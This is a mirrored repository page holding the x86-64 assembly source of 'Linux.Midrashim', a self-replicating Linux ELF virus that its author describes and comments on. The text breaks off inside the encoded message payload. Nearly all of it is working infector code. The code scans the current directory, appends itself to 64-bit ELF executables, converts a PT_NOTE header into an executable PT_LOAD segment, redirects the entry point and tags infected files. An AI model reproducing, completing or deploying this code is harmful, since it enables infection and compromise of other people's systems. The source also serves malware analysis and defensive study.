mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 11:55:26 +00:00
563 lines
30 KiB
NASM
563 lines
30 KiB
NASM
|
; Linux.Midrashim
|
||
|
; Written by TMZ
|
||
|
;
|
||
|
; Finished on 30.05.2020
|
||
|
; Released on 07.11.2020
|
||
|
; The release was delayed because I was trying to code a fancy 90's style payload and due to lack of time, I'll leave this to another project.
|
||
|
; This is my first full assembly virus and should be assembled with FASM x64.
|
||
|
; - relies on PT_NOTE -> PT_LOAD infection technique and should work on regular x64 ELF executables (position independent or not).
|
||
|
; - should use mmap but instead it uses pread and pwrite (due to lazyness).
|
||
|
; - stores stuff on memory buffer (r15 register).
|
||
|
; - infects current directory (non recursively).
|
||
|
; - has several parts that could have improved, like detecting first virus execution with a better approach.
|
||
|
;
|
||
|
; Payload (non destructive) is a quote from a song and it's encoded for no reason whatsoever.
|
||
|
;
|
||
|
; A big thanks for those who keeps the VX scene alive!
|
||
|
; Feel free to email me: tmz@null.net || tmz@syscall.sh || thomazi@linux.com
|
||
|
; @guitmz || @TMZvx
|
||
|
; https://www.guitmz.com
|
||
|
; https://syscall.sh
|
||
|
;
|
||
|
; Use at your own risk, I'm not responsible for any damages that this may cause, do not spread it into the wild!
|
||
|
;
|
||
|
; References:
|
||
|
; https://www.symbolcrash.com/2019/03/27/pt_note-to-pt_load-injection-in-elf
|
||
|
; https://www.wikidata.org/wiki/Q6041496
|
||
|
; https://legacyofkain.fandom.com/wiki/Ozar_Midrashim
|
||
|
; https://en.wikipedia.org/wiki/Don%27t_Be_Afraid_(album)
|
||
|
;
|
||
|
; Stack buffer:
|
||
|
; r15 + 0 = stack buffer (10000 bytes) = stat
|
||
|
; r15 + 48 = stat.st_size
|
||
|
; r15 + 144 = ehdr
|
||
|
; r15 + 148 = ehdr.class
|
||
|
; r15 + 152 = ehdr.pad
|
||
|
; r15 + 168 = ehdr.entry
|
||
|
; r15 + 176 = ehdr.phoff
|
||
|
; r15 + 198 = ehdr.phentsize
|
||
|
; r15 + 200 = ehdr.phnum
|
||
|
; r15 + 208 = phdr = phdr.type
|
||
|
; r15 + 212 = phdr.flags
|
||
|
; r15 + 216 = phdr.offset
|
||
|
; r15 + 224 = phdr.vaddr
|
||
|
; r15 + 232 = phdr.paddr
|
||
|
; r15 + 240 = phdr.filesz
|
||
|
; r15 + 248 = phdr.memsz
|
||
|
; r15 + 256 = phdr.align
|
||
|
; r15 + 300 = jmp rel
|
||
|
; r15 + 350 = directory size
|
||
|
; r15 + 400 = dirent = dirent.d_ino
|
||
|
; r15 + 416 = dirent.d_reclen
|
||
|
; r15 + 418 = dirent.d_type
|
||
|
; r15 + 419 = dirent.d_name
|
||
|
; r15 + 3000 = first run control flag
|
||
|
; r15 + 3001 = decoded payload
|
||
|
|
||
|
format ELF64 executable 3
|
||
|
|
||
|
SYS_EXIT = 60
|
||
|
SYS_OPEN = 2
|
||
|
SYS_CLOSE = 3
|
||
|
SYS_WRITE = 1
|
||
|
SYS_READ = 0
|
||
|
SYS_EXECVE = 59
|
||
|
SYS_GETDENTS64 = 217
|
||
|
SYS_FSTAT = 5
|
||
|
SYS_LSEEK = 8
|
||
|
SYS_PREAD64 = 17
|
||
|
SYS_PWRITE64 = 18
|
||
|
SYS_SYNC = 162
|
||
|
STDOUT = 1
|
||
|
EHDR_SIZE = 64
|
||
|
ELFCLASS64 = 2
|
||
|
O_RDONLY = 0
|
||
|
O_RDWR = 2
|
||
|
SEEK_END = 2
|
||
|
DIRENT_BUFSIZE = 1024
|
||
|
MFD_CLOEXEC = 1
|
||
|
DT_REG = 8
|
||
|
PT_LOAD = 1
|
||
|
PT_NOTE = 4
|
||
|
PF_X = 1
|
||
|
PF_R = 4
|
||
|
FIRST_RUN = 1
|
||
|
V_SIZE = 2631
|
||
|
|
||
|
segment readable executable
|
||
|
entry v_start
|
||
|
|
||
|
v_start:
|
||
|
mov r14, [rsp + 8] ; saving argv0 to r14
|
||
|
push rdx
|
||
|
push rsp
|
||
|
sub rsp, 5000 ; reserving 5000 bytes
|
||
|
mov r15, rsp ; r15 has the reserved stack buffer address
|
||
|
|
||
|
check_first_run:
|
||
|
mov rdi, r14 ; argv0 to rdi
|
||
|
mov rsi, O_RDONLY
|
||
|
xor rdx, rdx ; not using any flags
|
||
|
mov rax, SYS_OPEN
|
||
|
syscall ; rax contains the argv0 fd
|
||
|
|
||
|
mov rdi, rax
|
||
|
mov rsi, r15 ; rsi = r15 = stack buffer address
|
||
|
mov rax, SYS_FSTAT ; getting argv0 size in bytes
|
||
|
syscall ; stat.st_size = [r15 + 48]
|
||
|
|
||
|
cmp qword [r15 + 48], V_SIZE ; compare argv0 size with virus size
|
||
|
jg load_dir ; if greater, not first run, continue infecting without setting control flag
|
||
|
|
||
|
mov byte [r15 + 3000], FIRST_RUN ; set the control flag to [r15 + 3000] to represent virus first execution, not a great approach but will do for now
|
||
|
|
||
|
load_dir:
|
||
|
push "." ; pushing "." to stack (rsp)
|
||
|
mov rdi, rsp ; moving "." to rdi
|
||
|
mov rsi, O_RDONLY
|
||
|
xor rdx, rdx ; not using any flags
|
||
|
mov rax, SYS_OPEN
|
||
|
syscall ; rax contains the fd
|
||
|
|
||
|
pop rdi
|
||
|
cmp rax, 0 ; if can't open file, exit now
|
||
|
jbe v_stop
|
||
|
|
||
|
mov rdi, rax ; move fd to rdi
|
||
|
lea rsi, [r15 + 400] ; rsi = dirent = [r15 + 400]
|
||
|
mov rdx, DIRENT_BUFSIZE ; buffer with maximum directory size
|
||
|
mov rax, SYS_GETDENTS64
|
||
|
syscall ; dirent contains the directory entries
|
||
|
|
||
|
test rax, rax ; check directory list was successful
|
||
|
js v_stop ; if negative code is returned, I failed and should exit
|
||
|
|
||
|
mov qword [r15 + 350], rax ; [r15 + 350] now holds directory size
|
||
|
|
||
|
mov rax, SYS_CLOSE ; close source fd in rdi
|
||
|
syscall
|
||
|
|
||
|
xor rcx, rcx ; will be the position in the directory entries
|
||
|
|
||
|
file_loop:
|
||
|
push rcx ; preserving rcx (important!!!)
|
||
|
cmp byte [rcx + r15 + 418], DT_REG ; check if it's a regular file dirent.d_type = [r15 + 418]
|
||
|
jne .continue ; if not, proceed to next file
|
||
|
|
||
|
.open_target_file:
|
||
|
lea rdi, [rcx + r15 + 419] ; dirent.d_name = [r15 + 419]
|
||
|
mov rsi, O_RDWR
|
||
|
xor rdx, rdx ; not using any flags
|
||
|
mov rax, SYS_OPEN
|
||
|
syscall
|
||
|
|
||
|
cmp rax, 0 ; if can't open file, exit now
|
||
|
jbe .continue
|
||
|
mov r9, rax ; r9 contains target fd
|
||
|
|
||
|
.read_ehdr:
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144]
|
||
|
mov rdx, EHDR_SIZE ; ehdr.size
|
||
|
mov r10, 0 ; read at offset 0
|
||
|
mov rax, SYS_PREAD64
|
||
|
syscall
|
||
|
|
||
|
.is_elf:
|
||
|
cmp dword [r15 + 144], 0x464c457f ; 0x464c457f means .ELF (little-endian)
|
||
|
jnz .close_file ; not an ELF binary, close and continue to next file if any
|
||
|
|
||
|
.is_64:
|
||
|
cmp byte [r15 + 148], ELFCLASS64 ; check if target ELF is 64bit
|
||
|
jne .close_file ; skipt it if not
|
||
|
|
||
|
.is_infected:
|
||
|
cmp dword [r15 + 152], 0x005a4d54 ; check signature in [r15 + 152] ehdr.pad (TMZ in little-endian, plus trailing zero to fill up a word size)
|
||
|
jz .close_file ; already infected, close and continue to next file if any
|
||
|
|
||
|
mov r8, [r15 + 176] ; r8 now holds ehdr.phoff from [r15 + 176]
|
||
|
xor rbx, rbx ; initializing phdr loop counter in rbx
|
||
|
xor r14, r14 ; r14 will hold phdr file offset
|
||
|
|
||
|
.loop_phdr:
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208]
|
||
|
mov dx, word [r15 + 198] ; ehdr.phentsize is at [r15 + 198]
|
||
|
mov r10, r8 ; read at ehdr.phoff from r8 (incrementing ehdr.phentsize each loop iteraction)
|
||
|
mov rax, SYS_PREAD64
|
||
|
syscall
|
||
|
|
||
|
cmp byte [r15 + 208], PT_NOTE ; check if phdr.type in [r15 + 208] is PT_NOTE (4)
|
||
|
jz .infect ; if yes, jackpot, start infecting
|
||
|
|
||
|
inc rbx ; if not, increase rbx counter
|
||
|
cmp bx, word [r15 + 200] ; check if we looped through all phdrs already (ehdr.phnum = [r15 + 200])
|
||
|
jge .close_file ; exit if no valid phdr for infection was found
|
||
|
|
||
|
add r8w, word [r15 + 198] ; otherwise, add current ehdr.phentsize from [r15 + 198] into r8w
|
||
|
jnz .loop_phdr ; read next phdr
|
||
|
|
||
|
.infect:
|
||
|
.get_target_phdr_file_offset:
|
||
|
mov ax, bx ; loading phdr loop counter bx to ax
|
||
|
mov dx, word [r15 + 198] ; loading ehdr.phentsize from [r15 + 198] to dx
|
||
|
imul dx ; bx * ehdr.phentsize
|
||
|
mov r14w, ax
|
||
|
add r14, [r15 + 176] ; r14 = ehdr.phoff + (bx * ehdr.phentsize)
|
||
|
|
||
|
.file_info:
|
||
|
mov rdi, r9
|
||
|
mov rsi, r15 ; rsi = r15 = stack buffer address
|
||
|
mov rax, SYS_FSTAT
|
||
|
syscall ; stat.st_size = [r15 + 48]
|
||
|
|
||
|
.append_virus:
|
||
|
; getting target EOF
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
mov rsi, 0 ; seek offset 0
|
||
|
mov rdx, SEEK_END
|
||
|
mov rax, SYS_LSEEK
|
||
|
syscall ; getting target EOF offset in rax
|
||
|
push rax ; saving target EOF
|
||
|
|
||
|
call .delta ; the age old trick
|
||
|
.delta:
|
||
|
pop rbp
|
||
|
sub rbp, .delta
|
||
|
|
||
|
; writing virus body to EOF
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
lea rsi, [rbp + v_start] ; loading v_start address in rsi
|
||
|
mov rdx, v_stop - v_start ; virus size
|
||
|
mov r10, rax ; rax contains target EOF offset from previous syscall
|
||
|
mov rax, SYS_PWRITE64
|
||
|
syscall
|
||
|
|
||
|
cmp rax, 0
|
||
|
jbe .close_file
|
||
|
|
||
|
.patch_phdr:
|
||
|
mov dword [r15 + 208], PT_LOAD ; change phdr type in [r15 + 208] from PT_NOTE to PT_LOAD (1)
|
||
|
mov dword [r15 + 212], PF_R or PF_X ; change phdr.flags in [r15 + 212] to PF_X (1) | PF_R (4)
|
||
|
pop rax ; restoring target EOF offeset into rax
|
||
|
mov [r15 + 216], rax ; phdr.offset [r15 + 216] = target EOF offset
|
||
|
mov r13, [r15 + 48] ; storing target stat.st_size from [r15 + 48] in r13
|
||
|
add r13, 0xc000000 ; adding 0xc000000 to target file size
|
||
|
mov [r15 + 224], r13 ; changing phdr.vaddr in [r15 + 224] to new one in r13 (stat.st_size + 0xc000000)
|
||
|
mov qword [r15 + 256], 0x200000 ; set phdr.align in [r15 + 256] to 2mb
|
||
|
add qword [r15 + 240], v_stop - v_start + 5 ; add virus size to phdr.filesz in [r15 + 240] + 5 for the jmp to original ehdr.entry
|
||
|
add qword [r15 + 248], v_stop - v_start + 5 ; add virus size to phdr.memsz in [r15 + 248] + 5 for the jmp to original ehdr.entry
|
||
|
|
||
|
; writing patched phdr
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
mov rsi, r15 ; rsi = r15 = stack buffer address
|
||
|
lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208]
|
||
|
mov dx, word [r15 + 198] ; ehdr.phentsize from [r15 + 198]
|
||
|
mov r10, r14 ; phdr from [r15 + 208]
|
||
|
mov rax, SYS_PWRITE64
|
||
|
syscall
|
||
|
|
||
|
cmp rax, 0
|
||
|
jbe .close_file
|
||
|
|
||
|
.patch_ehdr:
|
||
|
; patching ehdr
|
||
|
mov r14, [r15 + 168] ; storing target original ehdr.entry from [r15 + 168] in r14
|
||
|
mov [r15 + 168], r13 ; set ehdr.entry in [r15 + 168] to r13 (phdr.vaddr)
|
||
|
mov r13, 0x005a4d54 ; loading virus signature into r13 (TMZ in little-endian)
|
||
|
mov [r15 + 152], r13 ; adding the virus signature to ehdr.pad in [r15 + 152]
|
||
|
|
||
|
; writing patched ehdr
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144]
|
||
|
mov rdx, EHDR_SIZE ; ehdr.size
|
||
|
mov r10, 0 ; ehdr.offset
|
||
|
mov rax, SYS_PWRITE64
|
||
|
syscall
|
||
|
|
||
|
cmp rax, 0
|
||
|
jbe .close_file
|
||
|
|
||
|
.write_patched_jmp:
|
||
|
; getting target new EOF
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
mov rsi, 0 ; seek offset 0
|
||
|
mov rdx, SEEK_END
|
||
|
mov rax, SYS_LSEEK
|
||
|
syscall ; getting target EOF offset in rax
|
||
|
|
||
|
; creating patched jmp
|
||
|
mov rdx, [r15 + 224] ; rdx = phdr.vaddr
|
||
|
add rdx, 5
|
||
|
sub r14, rdx
|
||
|
sub r14, v_stop - v_start
|
||
|
mov byte [r15 + 300 ], 0xe9
|
||
|
mov dword [r15 + 301], r14d
|
||
|
|
||
|
; writing patched jmp to EOF
|
||
|
mov rdi, r9 ; r9 contains fd
|
||
|
lea rsi, [r15 + 300] ; rsi = patched jmp in stack buffer = [r15 + 208]
|
||
|
mov rdx, 5 ; size of jmp rel
|
||
|
mov r10, rax ; mov rax to r10 = new target EOF
|
||
|
mov rax, SYS_PWRITE64
|
||
|
syscall
|
||
|
|
||
|
cmp rax, 0
|
||
|
jbe .close_file
|
||
|
|
||
|
mov rax, SYS_SYNC ; commiting filesystem caches to disk
|
||
|
syscall
|
||
|
|
||
|
.close_file:
|
||
|
mov rax, SYS_CLOSE ; close source fd in rdi
|
||
|
syscall
|
||
|
|
||
|
.continue:
|
||
|
pop rcx
|
||
|
add cx, word [rcx + r15 + 416] ; adding directory record lenght to cx (lower rcx, for word)
|
||
|
cmp rcx, qword [r15 + 350] ; comparing rcx counter with r10 (directory records total size)
|
||
|
jne file_loop ; if counter is not the same, continue loop. Exit virus otherwise
|
||
|
|
||
|
cmp byte [r15 + 3000], FIRST_RUN ; checking if custom control flag we set earlier indicates virus first execution
|
||
|
jnz infected_run ; if control flag != 1, it should be running from an infected file, use normal payload
|
||
|
call show_msg ; if control flag == 1, assume virus is being executed for the first time and display a different message
|
||
|
info_msg:
|
||
|
db 'Midrashim by TMZ (c) 2020', 0xa ; not the nicest approach like I mentioned before but quick to implement
|
||
|
info_len = $-info_msg
|
||
|
show_msg:
|
||
|
pop rsi ; info_msg address to rsi
|
||
|
mov rax, SYS_WRITE
|
||
|
mov rdi, STDOUT ; display payload
|
||
|
mov rdx, info_len
|
||
|
syscall
|
||
|
jmp cleanup ; cleanup and exit
|
||
|
|
||
|
infected_run:
|
||
|
; 1337 encoded payload, very hax0r
|
||
|
call payload
|
||
|
msg:
|
||
|
; payload first part
|
||
|
db 0x59, 0x7c, 0x95, 0x95, 0x57, 0x9e, 0x9d, 0x57
|
||
|
db 0xa3, 0x9f, 0x92, 0x57, 0x93, 0x9e, 0xa8, 0xa3
|
||
|
db 0x96, 0x9d, 0x98, 0x92, 0x57, 0x7e, 0x57, 0x98
|
||
|
db 0x96, 0x9d, 0x57, 0xa8, 0x92, 0x92, 0x57, 0x96
|
||
|
db 0x57, 0x9f, 0xa2, 0x94, 0x92, 0x57, 0x9f, 0x9c
|
||
|
db 0x9b, 0x9c, 0x94, 0xa9, 0x96, 0xa7, 0x9f, 0x9e
|
||
|
db 0x98, 0x57, 0x89, 0x9c, 0x9d, 0x96, 0x9b, 0x93
|
||
|
db 0x57, 0x7a, 0x98, 0x73, 0x9c, 0x9d, 0x96, 0x9b
|
||
|
db 0x93, 0x57, 0xa4, 0x96, 0x9b, 0xa0, 0x9e, 0x9d
|
||
|
db 0x94, 0x57, 0x99, 0x92, 0xa3, 0xa4, 0x92, 0x92
|
||
|
db 0x9d, 0x57, 0xa3, 0x9f, 0x92, 0x57, 0x94, 0xa9
|
||
|
db 0x96, 0x9e, 0x9d, 0x57, 0x92, 0x9b, 0x92, 0xa5
|
||
|
db 0x96, 0xa3, 0x9c, 0xa9, 0xa8, 0x57, 0x96, 0x9d
|
||
|
db 0x93, 0x57, 0xa3, 0xa9, 0x92, 0x92, 0xa8, 0x41
|
||
|
db 0x7c, 0x9f, 0x5b, 0x57, 0x9e, 0x95, 0x57, 0x7e
|
||
|
db 0x57, 0x9f, 0x96, 0x93, 0x57, 0xa3, 0x9f, 0x92
|
||
|
db 0x57, 0x9a, 0x9c, 0x9d, 0x92, 0xae, 0x57, 0x7e
|
||
|
db 0x54, 0x93, 0x57, 0x9f, 0x96, 0xa5, 0x92, 0x57
|
||
|
db 0x54, 0x92, 0x9a, 0x57, 0x9a, 0x96, 0xa0, 0x92
|
||
|
db 0x57, 0x9c, 0x9d, 0x92, 0x57, 0x9c, 0x95, 0x57
|
||
|
db 0xa3, 0x9f, 0x9c, 0xa8, 0x92, 0x57, 0x9a, 0x92
|
||
|
db 0x5b, 0x57, 0xa3, 0x9f, 0x92, 0x9d, 0x57, 0x7e
|
||
|
db 0x54, 0x93, 0x57, 0xa8, 0x92, 0x9d, 0x93, 0x57
|
||
|
db 0x9a, 0xae, 0xa8, 0x92, 0x9b, 0x95, 0x57, 0xa3
|
||
|
db 0x9c, 0x57, 0xa8, 0xa3, 0x96, 0x9b, 0xa0, 0x57
|
||
|
db 0xa3, 0x9f, 0x92, 0x57, 0x9b, 0x96, 0x9d, 0x93
|
||
|
db 0xa8, 0x98, 0x96, 0xa7, 0x92, 0x57, 0x96, 0x9d
|
||
|
db 0x93, 0x57, 0xa8, 0x98, 0x96, 0xa9, 0x92, 0x57
|
||
|
db 0x92, 0xa5, 0x92, 0xa9, 0xae, 0x99, 0x9c, 0x93
|
||
|
db 0xae, 0x41, 0x8e, 0x9c, 0xa2, 0x57, 0xa8, 0x92
|
||
|
db 0x92, 0x5b, 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8
|
||
|
db 0x92, 0x57, 0x7e, 0x57, 0x94, 0x9c, 0xa3, 0x57
|
||
|
db 0xa3, 0x9f, 0x9e, 0xa8, 0x57, 0xa8, 0x9c, 0xa9
|
||
|
db 0xa3, 0x57, 0x9c, 0x95, 0x57, 0x95, 0x9e, 0x92
|
||
|
db 0x9b, 0x93, 0x57, 0x99, 0x92, 0x9f, 0x9e, 0x9d
|
||
|
db 0x93, 0x57, 0x9a, 0x92, 0x5d, 0x57, 0x79, 0x92
|
||
|
db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x5d, 0x5d, 0x5d
|
||
|
db 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57
|
||
|
db 0x7e, 0x54, 0xa5, 0x92, 0x57, 0x94, 0x9c, 0xa3
|
||
|
db 0x57, 0xa8, 0xa7, 0x9e, 0xa0, 0x92, 0xa8, 0x41
|
||
|
db 0x79, 0x92, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57
|
||
|
db 0x7e, 0x57, 0x94, 0x9c, 0x57, 0x99, 0x92, 0xa3
|
||
|
db 0xa4, 0x92, 0x92, 0x9d, 0x57, 0xa3, 0x9f, 0x92
|
||
|
db 0x57, 0xb1, 0x9c, 0x9d, 0x92, 0xa8, 0x5b, 0x57
|
||
|
db 0x92, 0xa5, 0x92, 0x9d, 0x57, 0xa4, 0x9f, 0x92
|
||
|
db 0x9d, 0x57, 0x7e, 0x54, 0x9a, 0x57, 0x9d, 0x9c
|
||
|
db 0xa3, 0x57, 0xa8, 0xa2, 0xa7, 0xa7, 0x9c, 0xa8
|
||
|
db 0x92, 0x93, 0x57, 0xa3, 0x9c, 0x41, 0x79, 0x92
|
||
|
db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57, 0x7e, 0x54
|
||
|
db 0x9a, 0x57, 0x96, 0x57, 0xa8, 0xa2, 0xa8, 0xa7
|
||
|
db 0x9e, 0x98, 0x9e, 0x9c, 0xa2, 0xa8, 0x57, 0xa7
|
||
|
db 0x92, 0xa9, 0xa8, 0x9c, 0x9d, 0x57, 0xa9, 0x92
|
||
|
db 0xa7, 0x9c, 0xa9, 0xa3, 0x57, 0x41, 0x76, 0x9d
|
||
|
db 0x93, 0x57, 0x9e, 0xa3, 0x54, 0xa8, 0x57, 0xa3
|
||
|
db 0x9e, 0x9a, 0x92, 0x57, 0xa3, 0x9c, 0x57, 0x94
|
||
|
db 0x9c, 0x57, 0xa8, 0x9f, 0x9c, 0xa7, 0xa7, 0x9e
|
||
|
db 0x9d, 0x94, 0x5d, 0x59, 0x41, 0x37, 0x41
|
||
|
; payload second part
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
|
||
|
db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x58
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
|
||
|
db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
|
||
|
db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
|
||
|
db 0x55, 0x55, 0x58, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
|
||
|
db 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x52, 0x55, 0x55, 0x55, 0x55, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
|
||
|
db 0x55, 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x5d
|
||
|
db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
|
||
|
db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
|
||
|
db 0x55, 0x55, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55
|
||
|
db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
|
||
|
db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
|
||
|
db 0x55, 0x55, 0x52, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x61, 0x55, 0x55, 0x57, 0x57, 0x57
|
||
|
